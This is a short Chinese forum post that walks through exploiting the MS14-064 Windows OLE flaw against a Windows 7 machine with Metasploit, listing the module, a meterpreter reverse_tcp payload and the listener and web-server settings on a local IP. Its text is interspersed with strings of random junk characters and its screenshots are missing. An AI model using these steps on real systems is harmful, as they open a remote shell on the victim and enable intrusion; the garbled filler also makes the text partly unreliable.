找回密码
 立即注册
查看: 2288|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |正序浏览 |阅读模式

, s" h' g$ a" o 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示 $ i5 I. z0 P. l

& n: V* a. [$ B1 ]0 B! I

( i. K' G" k: N& j! M7 A K 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 0 B8 o+ g' `# g4 {) B+ V$ |

- \7 J1 d- u$ [

3 Y5 l+ t2 L4 L% y2 s m! N 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp5 y( K$ |# u0 R+ ^

8 F; J; p# J; P

1 u/ \" X& V5 R# z             set AllowPowershellPrompt true/ G3 [, ^; B# Q q8 _

4 Q; l7 h! F7 N6 u$ g2 C% R$ a- N

- G7 W. p. V8 q4 u. e             Set LHOST 192.168.0.109" g, b' Q. C( _

5 z& B4 X; ^! [ l" |

8 H9 x8 n. X; l$ \ `# ]             set SRVHOST 192.168.0.1096 L1 t0 M0 |" K" `4 N

r( i, @8 \; M u8 U& I l9 n' |4 Y

- i/ L7 N4 f' r) _0 S             Set uripath share $ n& T( q7 L# \/ w( Z \

$ g2 E6 |: [" _$ ~& b

& y/ {6 N; R; G% f% |8 a8 X. O             Set srvport 80 5 F& E& X9 z3 d; e: ]1 W

) s* P! s9 @% v/ o, m+ V% t

3 x: W% e5 P6 @' @4 V* F   4 w# O" T9 l6 T7 v1 i3 ]9 I

5 Y* z; X& N9 ~, @' Y M

; w6 R9 o& U+ x2 ]   * D" u0 b R" N! N5 Z

+ a2 J4 v- y* w9 p# y

3 i6 t7 a) O4 `5 X M$ h6 d; ?  ) [* i* N3 ?$ i @+ T* y

# ~) Z7 A2 y5 C2 o

0 F8 M( R: v6 ]; d5 \8 V% T  6 D2 T. h9 ~$ Y) n* P/ T

8 E2 I9 B. M% m$ s' V( b

3 d) W8 I4 |- U, H' L6 O  9 J3 y1 q, s/ B' ~2 H- F3 W

' U0 b3 I; W6 \ A- D; R2 I

A: w4 E: b {- B2 k0 K+ y5 W" W' g 下面我们来访问本地地址如图: 9 j. Q( S; f& a8 s9 N

7 n8 N ~4 h2 z6 u; U

2 m+ s/ r# e, H2 R! Y: m   4 c2 \1 b1 j' n3 @) t% v

, I" y& z5 n- p {

8 y: k9 a- ?( l, R/ v% M   4 Y3 H( |$ r8 M/ Q1 y G2 d

4 s! f' [+ ]5 N. W2 P7 D' B

) L- O+ Y6 u& p' [ ( H% \9 J5 Z8 i9 ^& B: L

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表